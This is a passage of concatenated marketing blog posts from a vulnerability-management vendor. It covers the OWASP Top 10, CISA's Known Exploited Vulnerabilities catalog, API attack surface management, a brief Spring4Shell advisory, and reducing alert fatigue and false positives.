flawed approach by optimizing the individual tools and manually consolidating data? The answer is no – there are Single Full Stack Solutions available to provide a corrective course of action. To learn more about why Single Full Stack VM Matters, click the button below      Simplifying VM with a Unified Approach We know managing multiple tools can be overwhelming. That’s why our Network Vulnerability Management (NVM) delivers a unified solution for comprehensive coverage. With offices in Dublin and New York, we simplify security for organizations worldwide. ### OWASP Top 10 Webinar PRESENTERS: Eoin Kearny | Jim Manico Eoin and Jim sit down to take a look at the OWASP Top 10 and how they affect organizations. WATCH NOW > The OWASP Top 10 is a standard awareness document for web developers and web application security professionals. It represents a broad consensus about the most critical security risks to web applications. As software developers author code that makes up a web application, they need to embrace and practice various secure coding techniques. This training provides defensive instruction in relation to the OWASP Top Ten to aid developers in authoring secure software. A01:2021-Broken Access Control A02:2021-Cryptographic Failure A03:2021-Injection A04:2021-Insecure Design A05:2021-Security Misconfiguration A06:2021-Vulnerable and Outdated Components A07:2021-Identification and Authentication Failures A08:2021-Software and Data Integrity Failures A09:2021-Security Logging and Monitoring Failure A10:2021-Server-Side Request Forgery Excerpt: Defensive instruction in relation to the OWASP Top Ten to aid developers in authoring secure software. ### CISA 101 for Enterprises – Why CISA Matters What is CISA? CISA stands for the Cybersecurity and Infrastructure Security Agency (CISA) and it leads the United States national effort to understand, manage, and reduce risk to American cyber and physical infrastructure. Its vision is to achieve a secure and resilient critical infrastructure for the American people.   Is CISA just a concern for Government Agencies? No, CISA plays two key roles: Quarterback for the Federal Cybersecurity Team – CISA protects and defends the American home front – the federal civilian government networks. National Coordinator for Critical Infrastructure and Resilience – CISA also looks at the entire threat picture and works with partners across both government and industry. As threats continue to evolve, no single organization or entity has all the answers for how to address cyber threats. By bringing together insight and capabilities within public AND private sectors, a collective defense is built against the threats the nation faces. Enterprises can benefit from this collective insight.   How Exactly Does the Enterprise Benefit from the Collective Insight that CISA has built? The answer is to be found in the CISA list. CISA has built a list called the Known Exploited Vulnerabilities Catalog. It is based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to federal agencies and private enterprises.   Are Enterprises legally required to remediate identified vulnerabilities on the CISA list? Binding Operational Directive (BOD) 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice.   Can and Should the Enterprise Share Cyber Event Information? Yes and Yes. Cybersecurity information sharing is essential to collective defense and strengthening cybersecurity for the Nation. When cyber incidents are reported quickly, CISA can use this information to render assistance and provide a warning to prevent other organizations and entities from falling victim to a similar attack. This information is also critical to identifying trends that can help efforts to protect the homeland. Stakeholders can learn how to share cyber event information here - Sharing Cyber Event Information Fact Sheet.   Is the CISA List Kept up to date? This catalog is actively kept up to date – here is an example of a recent update from the CISA website:     How can I keep up to date on the list? Enterprises can subscribe to the update bulletin here - Subscribe to the Known Exploited Vulnerabilities Catalog Update Bulletin.   Is there an efficient way for my Enterprise Vulnerability Management (VM) Program to quickly identify if any of our detected vulnerabilities match the current CISA list? Edgescan currently offers a new threat Intelligence & risk-based prioritization feature. It enables a new view for Enterprises to cross-reference their vulnerabilities with the CISA exploit list.     To learn more how to refine your remediation efforts with the CISA exploit list, go to ### Effective Attack Surface Management – Three Steps to Overcoming the Challenge of API Vulnerabilities The enterprise attack surface is a continuous challenge for any Vulnerability Management (VM) Program. Not only is it constantly changing, its continuously evolving. Anything facing public internets including Cloud deployments, Data Centers, Firewalls, IOT Devices, Servers and Web Services is potentially attackable. But API’s are a different beast. They require a fundamentally different approach. And frankly, the industry is not mature in managing the special case of API’s.     What Makes API’s so Challenging – Can We Talk?  Not to be dismissive but Web and IP are more easily dealt with just standard scanning tools. Exposures related to things like the Administrator Console or Internal Databases in the context of Attack Surface Management are relatively straightforward to handle and there are mature solutions to deal with them. API’s are a different breed of animal.    The principal challenge is that the security specialist needs to “talk” to an API. One cannot detect API issues with port scanning-only type solutions – it requires a multi-layer probing approach. API’s can “hide” behind regular web ports without being found by typical port scanning technologies.     Even when found, API’s are constantly changing. Changes on the backend can expose new sensitive data and changes to the application present new risks altogether. Traditional Network and Application scanning tools were not made for this kind of complexity.      The Solution – A Three-Stepped Phased Approach  In order to talk to an API for detection purposes, a full stack probing technology needs to be deployed where it looks for API’s across the web application and network stack.     To provide total visibility – a three-phased approach is recommended:    Phase 1 Passive - Analyze the estate looking for indicators of APIs.    Phase 2 Interaction - To effectively discover unknown and shadow API’s, continuous asset profiling must be run against all available external addresses integrated with multilayered checks applied to all live services.    Phase 3 Assessment and Enumeration - After API discovery has been completed, run custom API security assessments against all live services. These are specific API security checks to determine the security posture of the discovered API’s.      Bonus Lesson – Extending ASM with VM – A Three-Layered Approach   But of course, no matter how accurate and continuous your Attack Surface Management (ASM) program is – one must still manage risk by accurately identifying vulnerabilities as they occur across the full technology stack. And then one must assess their impact and resolve them in a timely manner.  So just as we suggested a three-step approach to API discovery, we also suggest layering in three basic approaches with VM:    Layer 1 – ASM – continuously and accurately detect and assess your attack surface including the challenging case of API’s. What can be potentially hacked?    Layer 2 – Vulnerability Management – continuously and accurately detect all vulnerabilities and exposures across the full stack. Rank them by business concerns and tightly integrate with support operations to ensure timely remediation on what matters most.. What weaknesses do we have?  Layer 3 – Penetration Testing – armed with ASM and VM intelligence, perform laser-focused resilience tests on:  Areas of concern  Complex areas not suitable for automation such as business logic, to determine the validity of any potential issues  And take the extra step of breaking the business logic of applications for 100% validation. What can a skilled attacker do?        Proactive API Management  Scanning tools are all the rage for Enterprise ASM and VM. But despite the temptation of fixating on point scanning tools for one’s Vulnerability Management (VM) solution - it does not take a huge conceptual leap to think it would be easier to effectively run a VM program if one detects and shuts down rogue attack surface exposures including API’s even before the incidents start to happen. Yet the industry remains highly reactive with API vulnerability management. Smart VM means having Smart ASM. API’s can be the most challenging but, with the right approach, they can be managed just as proactively and effectively.      Want to learn more about Best Practices for External Attack Surface Management? Click Edgescan/The Evolving Attack Surface.  ### Spring4Shell - CVE-2022-22965 Introduction  At the end of March, a researcher discovered a zero-day vulnerability in the Spring Core framework, which became known as “Spring4Shell” (CVE-2022-22965). The name implies it is closely related to another vulnerability called Log4Shell, however, so far there appears to be no direct link.  This new vulnerability has a few requirements to be vulnerable in the known state:  A web application that uses Java Development Kit version 9 or later   Apache Tomcat to be running as a Servlet Container  Spring Framework versions - 5.2.0 to 5.2.19 or 5.3.0 to 5.3.17  Application packaged as a WAR file  Tomcat has spring-webmvc or spring-webflux dependencies from the Spring Framework.    What we are doing  Edgescan rolled out a test for vulnerable versions of the affected software using our network scanners. From today, 5th April, all scheduled assessments will check for the versions affected by CVE-2022-22965 and report them in customer estates as they are found. At this stage, no news is good news.  Given how early we are in this vulnerabilities cycle, we would recommend keeping an eye on your implementations of any of the above as a POC that may not require all 5 components could be available in the next few weeks.    Contact  Edgescan has automatically included this in testing as of today, 5th April. If we discover this in your environment it will be shown on your Edgescan dashboard. Our scan on-demand feature can be used if any customers would like to begin assessments, or feel free to reach out to our support team for any further queries.    Spring4Shell Defense with DAST The Spring4Shell vulnerability highlights the critical need for proactive application security. Our Dynamic Application Security Testing (DAST) actively detects and mitigates vulnerabilities in your web applications. With offices in Dublin and New York, we’re here to help you defend against evolving threats. ### What Exactly is an Evolving Attack Surface and Why Does it Matter? An evolving attack surface is a very evocative phrase. It almost suggests a science fiction-type futuristic world where menacing aliens have the power to morph your protective barriers and leverage them for easy access to your internal, unprotected assets. However, in 2022 for the typical Enterprise Vulnerability Management (VM) team, this suggestive image of a morphing attack surface is not a far stretch. The interesting twist is that the evolving nature of your attack surface is not the handiwork of an external actor, but rather, it evolves as your business sets up new web-based services and ever-expanding digital transformation exercises. The evolving attack surface is generated by your Enterprise’s need to create new strategic routes to market and deliver innovative and competitive services to your clients. So, the question is – If the enterprise creates its own attack surface exposures, why is it so difficult to manage? And why does it matter?    Attack Surface Management is Hard and It Really, Really Matters  “Evolving” Attack Surfaces Presents a Challenge – Continuous attack surface changes create the threat of potentially new exposures. These exposures could be the result of deploying new systems and servers with control measures that are not set up properly or a key service that is inadvertently exposed. It could be something at the administration level, like not configuring the services securely or it could simply be human error, exposing unintended services involved with new and rapidly expanding cloud service deployments. These inadvertent exposures are the golden moments of opportunity for a would-be attacker. The Attack Surface is Incredibly Wide - Just as Enterprise business direction adapts on the fly to new market conditions, so too does its internal and client-facing IT services. They are constantly changing. The way the attack surface changes is wide and varied – and the chance of human error with every new exposure is equally mixed. Anything facing public internets introduces potential attack surface exposures including: Cloud Data Centers Firewalls IOT devices Servers Services API’sBasically, any endpoint exposed to the public Internet is attackable - hence the need for vigilant Attack Surface Management (ASM). You will always have to Manage Risk – for each Enterprise, there are types of exposures – IP’s and Web Applications for example – that are intended to be exposed to the internet. This is specifically what they are used for - public access. Of course a business like eCommerce requires online purchases for their revenue goals. Out of the gate, a comprehensive Attack Surface Management (ASM) solution is required. But even traditional businesses like Government, Manufacturing and Agriculture are rapidly rolling out digital transformative offerings to become competitive. This means they continue to expose more services to the internet to access new streams of business. While this is a calculated decision to allow new public access – now an additional layer of managing attack surface exposure is introduced. Archiving Surface Management - Time is not our Friend – Visibility is of paramount importance in cyber security. We cannot secure what we cannot see. The longer a business allows old services to continue, the larger the window of exposure. While there is not a consistent pattern or explanation, it turns out that legacy services and their related exposed surfaces become more vulnerable over time. Allowing old services to persist is not playing it safe – it is introducing your organization to a larger window of exposure and in most cases, completely unnecessary risk. It turns out that in 2021, the average age of exposure used to breach was one-to-three years (Edgescan 2022 Stats Report). So if these Enterprises had a viable ASM solution – meaning they had identified and closed the avenue of attack earlier – the majority of these hacks could have been avoided. So Why Does it Matter? - It turns out that large, recent breaches are a result of not managing attack surface properly. Many recent high profile Ransomware attacks were a direct result of letting one’s guard down managing their attack surface. To illustrate the significance, consider that in the 2021 Colonial Pipeline attack, hackers launched a cyber-attack against the company and disrupted fuel supplies to the entire U.S. Southeast. Again poor ASM was at the root of the problem. The vulnerability may have been mitigated if a high level of visibility was in place via an ASM solution.   Human Error Means Human Vigilance is Necessary  Human error can wreak havoc. Issues created by the simple lack of knowledge that something was deployed, a firewall was configured incorrectly, a system is without a critical patch etc. are all reoccurring in every Enterprise. Each of these evolving exposures require immediate detection and an immediate business assessment to determine whether this is an unintentional issue or is aligned with intended business goals. Vigilance is not optional. You need to first detect accurately that an unintended exposure has occurred before you can assess whether it needs to be shut down or mitigated. This need for proactive detection and management is continuous and necessary.  Want to learn more about Best Practices for Attack Surface Management? Click Edgescan/The Evolving Attack Surface.  ### How to Make Your IT and Operations Team Security Remediation Superstars Necessary Links for a Necessary Chain  The best efforts of an enterprise IT and Operations team can be completely undone by one hacker leveraging one vulnerability at one given moment in time. IT and Operations should be very motivated to make sure they continuously have an effective security posture. But here we have a conundrum. The Operational Support and IT teams tasked with fixing but are not cyber security experts.  Then how can the Vulnerability Management (VM) team empower Ops and IT to perform effective and timely fixes? How can we make them Remediation Superstars?    Five Steps to Turn Your IT and Operations Team into Remediation Superstars:  Accuracy – False positives are the Achilles heel of effective remediation. Not only do they rob the support team of precious bandwidth, they actually slow the mean time to remediation. You must remove false positives before you communicate to your IT and Ops teams.  Brevity – IT and Operations already have their day-job. To ensure you get effective support against what really matters, you should take the time to present concisely all relevant vulnerabilities across the entire IT stack – web apps, network and devices etc. - in one single report. The faster they can ascertain the issue, the faster they can act on your alerts. The faster they can act, the lower the remediation time to fix.  Business Ranking – Do not let the quantity of alert-types dictate the prioritization of the resolution requests. Instead rank them by business severity. This will ensure you get the lowest remediation time on the issues that really matter.  Remediation Guidance – Integrate your alerts with actual step-by-step remediation guidance. In addition, offer a direct phone line so they can get verbal step-by-step guidance for critical items as needed. If you see a pattern of issues – say at the code level – provide proactive guidance on cyber hygiene best practices to ensure these types of vulnerabilities have no chance of appearing.  Daily Workflow Integration – Do the research up front on where your IT and Operations team typically manage their task assignments. If it’s a ticketing system, then integrate your business-ranked alerts and remediation guidance into that system. If it’s a bug-tracking system like Jira, then likewise provide your alerts into that system. If it’s something simple like an Instant Message – they use that IM system. To ensure the most efficient and timely communication, make sure your Vulnerability Management (VM) system can integrate with your support team’s chosen system. The goal is to make the vulnerability remediation effort part of their daily workflow. This will both make efficient use of your support team’s limited bandwidth and have a direct impact on remediation times.    Alignment is Key  As a precautionary measure, you should be proactive and remind your IT and Operational Support team that you are actively identifying vulnerabilities across the attack surface that may have real business impact to not only operational runtime and IT services availability but the business’s bottom-line. All of you are on the same team with this common goal.  All of you should be aligned to prevent any unnecessary business disruption. The key to realizing that goal is lowering remediation time on the issues that have business impact. By taking these five steps, you can ensure that members of your wider team become remediation superstars.  Want to learn more about Enabling Your IT and Operations Team? click Edgescan/ Does a Hybrid Model for Vulnerability Management Make Sense?    Empowering Teams with NVM We believe in empowering IT and operations teams to succeed. Our Network Vulnerability Management (NVM) provides actionable insights, helping your teams address risks efficiently. From Dublin to New York, we support organizations in transforming their security operations into proactive defense mechanisms. ### How to Fix Security Alert Fatigue (And Yes, it is real) The Security Alert Fatigue Problem is Real  According to a recent Dimensional Research report (2020), “56% of Large Companies Handle 1,000+ Security Alerts Each Day.” And year-over-year the problem is getting worse. “Seventy percent said the volume of security alerts they receive on a daily basis have more than doubled in the past five years.” Naturally this puts stress on the security staff. “Most (93%) said they cannot address all alerts in the same day.” This exponential growth in the sheer volume of alerts and the staff shortages to manage them all contribute to alert fatigue. Alert fatigue has now become widespread across enterprise security teams – “83% said staff has alert fatigue.” (Dimension Research Report 2020)    Five Practical Steps to Beating Alert Fatigue  There is light at the end of the tunnel. Recent innovative approaches and technologies can help alleviate the causes of alert fatigue at the source. Here are five practical steps you can take today:    Take Out the False Positives – The bad news is that while automated scanning tools have dealt with the problem of identifying vulnerabilities at scale, they have also created the alert and noise problem. Automated tools cannot rule out the false positives so manual validation is still necessary. Fortunately, there is a new breed of Vulnerability Management platforms that offer integrated expert vulnerability assessments. They can assure virtual false-positive free alerts, preventing additional strain on your internal security staff. This hybrid model integrates both automation and human validation. Alert fatigue is too often accepted as status quo, but it does not need to be. In 2022 there is no reason for any team to spend limited resources on chasing false positives.  Aggregate Your Alert Dashboards – While automated scanning tools have evolved, they continue to be siloed, IT layer-specific point solutions each with their own specific alert dashboard. Its far less efficient and more time consuming to constantly scan and analyzing multiple dashboards. It also takes more effort to compile aggerated reports on your total security posture to deliver to management. Even worse than sucking staff bandwidth – and assuming you do have adequate staff - this lack of efficiency and increased time can slow the actual remediation time.  But again there is no reason in 2022 you have to live with multiple alert dashboards and allow it to impact your remediation times. Again, there are innovators that have consolidated one single dashboard of truth for each layer of the IT stack to make Alert Management much more efficient and lower your remediation times.   Contextualize – Deciphering which vulnerabilities have the largest business impact and need immediate attention can also create alert fatigue. Standards are shifting to pre-built technologies that contextualize each alert based on what business impact it may have on your organization. Its far more efficient to see the most significant risks on a single dashboard and immediately perform strategic remediation actions.  Closure Through On-Demand Pentests – Another dimension to alert fatigue is at the validation level. When a pentest is performed and the fix on the vulnerability is validated, one wants to be confident that it is in fact resolved. To achieve this, one should confirm that the pentesters themselves are in fact seasoned security professionals and they are familiar with your business processes and how your security posture provides resilience within the context of your operations. To reduce turnaround times and ensure continuous coverage, enterprises are moving to on-demand Penetration Testing as a Service (PTaaS) models.  Pivot from Alert Fatigue to Remediation Superstars – According to the 2022 Edgescan Stats Report, the mean time to remediate (fix code) at critical risk at the Web Application/API layer is 47.6 days and the mean time to remediate (patch/reconfigure) Device/Host Layer Critical Risk is 61.4 days.  You want to focus on fixing things and fixing them quickly.  To pivot your team from alert-fatigued soldiers to resilience enablers, you will need to shift focus from collating and validating results to remediation. And there are practical steps you can take to achieve this. Perhaps the most important step is to integrate the intelligence and remediation guidance into the workflow and support systems of your IT staff. This ensures that your accurate guidance will be in the hands of the support staff to resolve these issues and will lower the overall remediation time. The good news is that the industry is pivoting to vulnerability tracking tools that come pre-built with integrated hooks into common support systems to make this integration that much easier.    In Summary – The Pivot from Fatigued Soldier to Dragon Slayer  As the scale of automated tools has risen, so has the number of erroneous alerts per week. Just by taking action on these five basic steps, your team can recover from alert fatigue. The difference on staff psychology will be game-changing.  Want to learn more about Achieving Virtual 100% False Positive-Free Alerts? click Edgescan/ Does a Hybrid Model for Vulnerability Management Make Sense?  ### SXSW PAST EVENT: 11 March 2022 | Austin One-on-One Sessions provided: A dedicated session with an Edgescan Solution Professional Answers to any questions about needs within your particular environment Updates on all about the latest developments of the Edgescan Platform Exclusive gift from Edgescan to take home ### How To Make Your Vulnerability Alerts Virtually 100% False-Positive Free An Alarming Status Quo For those outside of the enterprise cyber security community, it can seem strange to even imagine that experienced security professionals live in a world where managing the noise associated with false-positive alerts is a daily and significant problem. But in 2022, for almost every Global Enterprise, this is simply a fact. But, before we think about how to resolve this issue, let’s first remind ourselves why one would want to rid their Vulnerability Management (VM) Program of false positives. The Very, Very, Very Bad Problem with False Positives Taking Eyes off What Matters – If you are constantly struggling to deal with false positives, it drastically impedes your ability to catch the vulnerabilities that truly matter – the ones that could potentially have a dramatic business impact. Resilience Menaces – Obviously exposures on your attack surface have the biggest impact on your security resilience posture. But the distraction and delay caused by false positives are often taken for granted. The hacker will exploit an exposure while you sort what’s real and what is simply noise. Confidence Deflators – Your team’s confidence can be impacted by inadvertently taking action on false positives only to realize you are running a fool’s errand. Management and IT can also have less confidence in your judgement when too many false flags are constantly communicated as real issues. Morale Killers – The simple drudgery of ridding oneself of false positives on its own can take away the initial strategic spirit of your team. But when the false positives leak into their remediation action and the support teams are chasing issues that are not issues – it takes the wind out of everyone’s sails. Bandwidth Siphons – Of course, if you have infinite time and budget, manually ruling out false positives can be done. But every Enterprise has a limited budget and limited staff and you do not want to squander the investment and time of your strategic security team by manually taking out false positives. You want your VM team to be focused on the prize – you want them to be proactive and align security best practices and tools to meet your ongoing and changing business goals. So How Do We Achieve Virtual 100% False-Positive Free Alerts? An interesting irony is that initially, the sheer scale of the number of vulnerabilities across the entire attack surface had to be handled with automation. While the scaling capabilities of automated alerts for each layer of the IT stack – web applications, network and devices, API’s etc. – matched the scale of increasing vulnerabilities – it also generated a lot of noise. To remove the noise, we must return to the human to rule them out. But there are efficient ways to do this – here are the three steps you should take: Number 1 – Alert Convergence – Before you begin the process of ruling out false positives, make the process more efficient by aggregating and contextualizing all the alerts from each layer of the IT stack to one dashboard. It becomes a more manageable task when taking them on from one source. Number 2 – Contextualize the Alerts – If you really want to optimize the process, then first rank all the alerts by type and business process so that when you remove the false positives you not only have accuracy, but you have business insight on what to act on first. Number 3 – Consider a Hybrid Platform – If you are already deploying a vulnerability solution for the automated alerts, consider a hybrid version where the supplier provides a team of experienced experts to perform the false-positive removal as part of the overall solution. These hybrid solutions can offer the bandwidth benefit of seasoned security experts thus allowing your VM security staff to focus on proactive and strategic activities to optimize your VM Program. With the scarcity of cyber security professionals, having a scalable set of security experts is beneficial to rule out false positives. In many cases, they can even as well as provide expert guidance. In Summary – Human Security Expertise is Key There is no magical automated bullet to rid oneself of the false-positive problem – there simply is no substitute for human security expertise to safely remove them. If this is ultimately what you need to do, then you need to face up to the question of how you will most efficiently achieve this – by an internal recruiting effort or tapping your existing staff within your department or in the form of a hybrid solution with your VM automated alert supplier. Keep in mind – false positive removal is a continual and necessary activity. The time to start slaying the noise dragon was yesterday. Want to learn more about Achieving Virtual 100% False Positive-Free Alerts? click Edgescan/ Does a Hybrid Model for Vulnerability Management Make Sense?     Making Your Alerts False-Positive Free False positives waste time and resources, which is why we focus on accuracy. Our Dynamic Application Security Testing (DAST) minimizes false positives, helping you focus on real threats. From Dublin to New York, we provide precision-driven security solutions. ### Five Ways You Can Make Your Vulnerability Management (VM) Program Smart Now So you are convinced that your need to adopt a “Smart” Vulnerability Management (VM) approach but you are not quite sure how to get started or even what to shoot for. Here are Five Very Important Steps you need to take to bring on the “Smart”.    Number 1 - Understand Business Goals and Then Automate Ranked Alerts  Yes, take a step back and think holistically how your business runs and what business processes are most critical to achieving your enterprise goals. Talk to your business line leaders and operational staff. Hit the whiteboard and talk through “what if” scenarios. Rank all of your business concerns as it pertains to any potential exposures to your attack surface. Then take on a Smart VM Platform that enables you to rank and automate each alert type across each IT layer so you receive automated business-ranked alerts. This is all done in the set-up stage. This is necessary. This is not sufficient – read on.  Number 2 - Make Sure its 100% Accurate  Want to ensure your get zero confidence from your support team when you present alerts – send them the automated alerts with no validation and let them spend days chasing false positives. You need to get Smart about the burden of noise generated by automated alerts. You need to adopt a Platform that integrates security specialists that rule our false positives BEFORE they are presented. In 2022, running your VM program virtually false-positive free is doable. VM with virtual 100% accuracy IS smart.    Number 3 - Don’t Waste Anyone’s Time – Give them the Whole Snapshot and Show Them Clearly What Matters Most  It’s easy to follow the typical IT stack layered specialist approach. One automated scanning tool for web applications. One tool for API scanning, One tool for network and devices. One ad hoc request for a pen test. For the past 10 years, most global enterprises have taken on the layered point-solution approach and then spent mountains of times hobbling together fractured intelligence reports across the attack surface. In 2022, that is no longer acceptable, nor is it Smart VM. There are full stack VM platforms that present your security posture in one snapshot.  They are pre-built to provide one single touchstone of truth that shows your security team AND your operational support team what issues need resolving now. Can we agree to buck the point solution tradition and take on Smart Full Stack VM now?  Number 4 - Understand Your Operational Support’s Daily Workflow (DO NOT INTERRUPT IT) and Become a Part of It  The vernacular of “Smart” typically places a high emphasis on the Intelligence it produces but when we run a VM Program – we have a higher standard. We have to make the enterprise resilient itself. We have to continuously ensure that the important vulnerabilities are remediated in a timely manner. The way we do that is to take Smart approaches when integrating with the support staff’s daily workflow. And this can be as simple as asking the support team how they like to take in their ticket information for seamless resolution. To achieve that seamless workflow integration in 2022 there are Smart VM platforms that integrate with whatever system your support team uses. And like the alert engine – it’s all automated. It’s all Smart.    Number 5 - Don’t Be An Alert Engine – Be a Remediation Engine  Congrats if you have completed the above Four Steps. Now here’s a challenge. On the one side you have continuous, ranked business-intelligent alerts and on the other side you have IT Operational Support staff that are not security experts but who are required to remediate the issue. So how to you get Security Specialist Remediation guidance into the hands of the IT Support staff? Good news once again is that there are Smart VM Platforms that can integrate Security Specialist Validation not only to rule out false positives but to provide timely, contextualized guidance on how to resolve that pressing issue at hand. With a Smart approach, that guidance and be integrated into the ticketing system for easy access or can be just a phone call away for verbal step-by-step specific remediation guidance. And you get bonus Smart points when you adopt proactive security specialist guidance when bad programming patterns are noted and best practice guidance is deployed before a vulnerability is actually picked up.  Be Smart, Be Bold  If you take these Five Significant Steps to Smart VM, we allow you to walk with a bit of swagger. For if you now have delivered to your company a proactive, continuous and business-intelligent remediation machine and you have a resilient enterprise to show for it – your Smart VM Program entitles you to bragging rights. If you don’t have your Smart VM swagger yet, let’s talk.  Like to learn more Why Smart VM Matters, click Read Whitepaper ### Five Simple Ways to Know if Your Vulnerability Management Program is “Smart” Do you think you have an optimal Vulnerability Management (VM) Program set up or perhaps, you are not so sure? Well, we have the test for you. Here are Five Indicators you need to be able to check off before you can say your VM Program is “Smart”:   Smartness Indicator #1 – Automation Let’s start with the most obvious Smart indicator – automating vulnerability alerts. But let’s up the game – Do you have tuned automated alerts across the entire IT stack including web applications, network and devices and API’s? You are not trying to manually compile those alerts for a composite view of the truth, are you? – that would not be smart.   Smartness Indicator #2 – Accuracy Of course, you have accuracy – that’s nothing to do with Smartness one might say – that’s Vulnerability Management 101. But actually, the advance of automated alerts has created an exponential growth in noise – false positives – and a sizable part of the security team’s workday is manually removing these false positives. This is far from strategic VM – this is far from Smart. If one adopts a hybrid model where integrated security experts ensure virtual false positive-free alerts – then you can check this one off of your list.   Smartness Indicator #3 – Contextualized Intelligence Alerts on their own are dumb. Each real discovered vulnerability across each layer of the attack surface represents a potential business problem. The actual significance of each impacted business problem is itself highly dependent on the nature of the business and the particular business processes. At the end of the day, one needs a singular view of what vulnerabilities matter the most to your business. And you need that continuously. Reacting to what matters – what has impact – is Smart. Automated, accurate and ranked vulnerabilities on one dashboard is Super Smart. Can you check this one off of your list?   Smartness Indicator #4 – Continuous Attack Surface Management The attack surface evolves. A productive web application with public internet-facing exposure may have had its day in your marketplace. A seemingly innocent decision to mothball that service but keep it alive just in case it is needed for special cases, has now become a playground for a hacker looking for access. For the global enterprise, every day there is a myriad of evolving attack surface exposures that need to be continuously and accurately monitored. Does your current Attack Surface Management Program guarantee that? Only 100% “Yes” answers can check this one off of your list. Flying blind is not Smart.   Smartness Indicator #5 – Operational Smartness Enablement So, if you have checked all four on the list above - on the one side, you have accurate, business-ranked vulnerability intelligence alerts across your entire attack surface, but on the other side of the house – you have an Operational Support Team. They have their own day job. They are not in possession of this intelligence nor do they have security expertise to know how to specifically remediate the issue. Remember we are not in a spot-the-vulnerability competition.  The end game here is to actually resolve the issues that matter the most. The end game is to make your Enterprise resilient. You can check this box if you have integrated ranked alerts with specific remediation guidance into the daily workflow of your Operational Support Teams. If your Ops Team rolls their eyes at your “Yes”, then you do not have it. Is This Checklist Realistic in 2022? Have we set the bar too high with this Five Box Smart VM check list? Is this even available today? Well in fact, these are all core features of the Edgescan Smart VM Platform and its clients are enjoying its benefits today. Edgescan clients can easily say they are Smart. Do we need to talk? Like to learn more Why Smart VM Matters, click Read Whitepaper   Building Smart VM Programs with PTaaS A smart vulnerability management program requires continuous testing and real-time insights. Our Penetration Testing as a Service (PTaaS) ensures you stay ahead by identifying and fixing vulnerabilities as they arise. With teams in Dublin and New York, we’re committed to helping you build a resilient security strategy. ### 2022 Vulnerability Stats Report Preview How can one achieve the necessary level of insight to be informed on what really matters? Gartner highlights the need for executives to become more agile in their vulnerability management approach and notes the trend to transition away from a centralized function toward a distributed, informed risk decision-making model.   Transitioning from Technical Security to Executive Risk Management “The CISO role has moved from a technical subject matter expert to that of an executive risk manager” (Gartner Identifies Top Security and Risk Management Trends for 2022, March 2022) “Enterprise cybersecurity needs and expectations are maturing, and executives require more agile security amidst an expanding attack surface. Thus, the scope, scale, and complexity of digital business makes it necessary to distribute cybersecurity decisions, responsibility, and accountability across the organization units and away from a centralized function.” (Gartner 2022)   Distributing Decisions - One of the Top 5 Five Security Trends for 2022 “By 2025, a single, centralized cybersecurity function will not be agile enough to meet the needs of digital organizations. CISOs must re-conceptualize their responsibility matrix to empower Boards of Directors, CEOs, and other business leaders to make their own informed risk decisions.” (Gartner Identifies Top Security and Risk Management Trends for 2022, March 2022)   Enabling Smart Vulnerable Management Decisions – Five Important Steps Here are five important steps to enable your Enterprise Vulnerability Management office to become an informed executive risk decision maker.   1 - Eliminate the Noise Automated scanners across the full stack generate a significant number of false positives. This noise clouds the actual relevant data to make informed decisions. Keep your security staff focused on what matters. Instead of having them manually remove false positives, utilize a Hybrid Vulnerability Management Platform with enterprise security experts in that role.   2 - Get a Single Picture of What Matters Your business leadership audience does not need (or want) a separate vulnerability assessment on each layer of the attack surface. They want a singular, composite view of what vulnerabilities can have an impact on their business. To be informed and decisive, they need the message to be simple and clear. Consider a Vulnerability Management Platform that: a) integrates alerts from all the layers of the full stack (from networking to web applications) and b) provides intelligence on the entire evolving attack surface including the challenging APIs.   3 - Rank Business Risk Alerts The limitations of CVSS are well known and well documented. Ideally, your Smart Vulnerability Management Platform should business-rank each vulnerability alert within the context of your organization. Smart risk management triages severe, high-impact vulnerabilities over high-volume, low-risk alerts.   4 - Verify with Integrated Pen Testing Traditional penetration testing is typically scheduled on the calendar for a finite number of times per year. But to make truly informed risk-based decisions, real vulnerabilities and their fixes need to be validated as they occur. An integrated on-demand pen testing service facilitates issue detection, remediation, and validation – all in one seamless efficient vulnerability management process.   5 - Integrate Risk Communication into Your Audience Systems Your Vulnerability Management Platform may currently give you a single dashboard of Vulnerability Business Risk Exposure. But is it accessible to your business decision makers and IT support team? Real-time integration into your risk management and ticketing systems enables them to make daily quick and conclusive decisions. Fortunately, leading Vulnerability Management Platforms now come pre-baked with integration into most major Enterprise IT and Risk systems. This is not a “nice to have” convenience feature. It is essential to positively impact remediation times. Only a day-to-day workflow integration can provide actionable visibility to your IT operations staff and business leadership team.   Smart Vulnerability Management Enables Informed Risk Management Decisions Informed risk managers use a single touchstone of prioritized high-risk alerts free of false positives across the entire attack surface. Ideally, this touchstone is integrated into the daily workflow of Security, Business Leadership, and IT functions. While Gartner predicts that most Enterprises will pivot to this model by 2025, it is imperative that leaders in this most relevant field do not fall behind. Taking these five steps to enable informed risk management decisions should be a priority in 2022. Read the latest Edgescan Vulnerability Management Statistics Report ### Five Reasons You Need to Embrace “Smart” Vulnerability Management Today You may have taken the initial steps and deployed automated scanning tools for your Vulnerability Management program (VM) only to find out that they generate a lot of noise and do not offer business context nor remediation guidance. Furthermore, the overhead to administrate these tools, rob your security team’s precious bandwidth to actually resolve real issues. In short, your Vulnerability Management Program is far from “Smart”. Here are Five Big Reasons why you need to embrace a Smart Approach for your VM Program:   Reason 1 – Contextualized Accurate Insight A Smart Approach delivers both accuracy and context. Accuracy is ensured with the hybrid model where security experts validate every alert to achieve virtual 100% false positive-free intelligence. Contextualized intelligence is delivered by categorizing the severity level of each type of vulnerability against your business processes and integrating automated ranked alerts into your single dashboard. The Smart approach delivers accurate results and prioritizes what needs attention first. Reason 2 – Adaptive Attack Surface Management The attack surface evolves. As businesses evolve new systems are deployed, decommissioned and systems change, firewall changes occur, and rogue deployments and API exposures are introduced. A Smart VM solution will continuously scan and intelligently discover and assess all elements of the attack surface as well as the logical controls associated with the API. Flying blind is not smart. Adaption is Smart.   Reason 3 – Single Dashboard of Truth A fragmented view of your security impedes your ability to make decisive actions on what really matters. The hacker certainly does not care what IT stack layer exposure they leverage to achieve their goals. A Smart Approach gives you a complete singular picture of your security posture – it’s not about enumerating vulnerabilities against each attack surface layer – it’s actually about resolving the important issues wherever they occur, right? Reason 4 – IT and Operations are “Smart” Remediators By integrating accurate full 